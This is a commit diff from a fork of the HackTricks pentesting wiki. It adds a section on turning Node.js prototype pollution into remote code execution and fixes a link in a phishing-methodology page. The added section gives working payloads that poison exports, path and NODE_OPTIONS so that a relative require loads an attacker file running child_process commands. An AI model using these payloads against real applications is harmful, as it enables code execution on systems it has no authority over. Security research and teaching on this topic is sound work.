coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3463] No subject

Browse Source
This commit is contained in:
CPol 2022-09-06 11:15:58 +00:00 committed by gitbook-bot
parent ad3e575f33
commit e23cfa1aad
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 113 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
generic-methodologies-and-resources/phishing-methodology/README.md
View File

@ -87,7 +87,7 @@ In order to make sure that the expired domain that you are going to buy **has al
* [https://hunter.io/](https://hunter.io)
* [https://anymailfinder.com/](https://anymailfinder.com)
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration).\
In order to **discover more** valid email addresses or **verify the ones** you have already discovered you can check if you can brute-force them smtp servers of the victim. [Learn how to verify/discover email address here](../../phishing-methodology/broken-reference/).\
Moreover, don't forget that if the users use **any web portal to access their mails**, you can check if it's vulnerable to **username brute force**, and exploit the vulnerability if possible.
## Configuring GoPhish

114
pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
View File

@ -159,8 +159,118 @@ var proc = fork('a_file.js');
## Forcing Spawn
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.\
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported**.
In the previous examples you saw how to trigger the gadget a functionality that **calls `spawn`** needs to be **present** (all methods of **`child_process`** used to execute something calls it). In the previous example that was **part of the the code**, but what if the code **isn't** calling it.
### Controlling a require file path
In this [**other writeup**](https://blog.sonarsource.com/blitzjs-prototype-pollution/) the user can control the file path were a **`require`** will be executed. In that scenario the attacker just needs to **find a `.js` file inside the system** that will **execute an spawn method when imported.**\
****Some examples of common files calling a spawn function when imported are:
* /path/to/npm/scripts/changelog.js
* /opt/yarn-v1.22.19/preinstall.js
### Setting require file path via prototype pollution
{% hint style="warning" %}
The **previous technique requires** that the **user controls the path of the file** that is going to be **required**. But this is not always true.
{% endhint %}
However, if the code is going to execute a require after the prototype pollution, even if you **don't control the path** that is going to be require and this **path is relative**, you **can force a different one abusing propotype pollution**. So even if the code line is like `require("./a_file.js")` it will **required the package you set**.
Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack:
* Find a **`.js` file inside the system** that when **required** will **execute something using `child_process`**
* If you can upload files to the platform you are attacking you might upload a file like that
* Pollute the paths to **force the require load of the `.js` file** that will execute something with child\_process
* **Pollute the environ/cmdline** to execute arbitrary code when a child\_process execution function is called (see the initial techniques)
#### Method 1 to set arbitrary require
{% tabs %}
{% tab title="exploit" %}
{% code overflow="wrap" %}
```javascript
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
// Manual Pollution
b = {}
b.__proto__.exports = { ".": "./malicious.js" }
b.__proto__["1"] = "/tmp"
// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
clone(USERINPUT);
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
```
{% endcode %}
{% endtab %}
{% tab title="malicious.js" %}
```javascript
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');
```
{% endtab %}
{% endtabs %}
#### Method 2 to set arbitrary require
{% tabs %}
{% tab title="exploit" %}
{% code overflow="wrap" %}
```javascript
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
// Manual Pollution
b = {}
b.__proto__.data = {}
b.__proto__.data.exports = { ".": "./malicious.js" }
b.__proto__.path = "/tmp"
b.__proto__.name = "./relative_path2.js" //This needs to be the relative path that will be imported in the require
// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
clone(USERINPUT);
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
```
{% endcode %}
{% endtab %}
{% tab title="malicious.js" %}
```javascript
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');
```
{% endtab %}
{% endtabs %}
## References
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
* [https://blog.sonarsource.com/blitzjs-prototype-pollution/](https://blog.sonarsource.com/blitzjs-prototype-pollution/)
* [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf)
<details>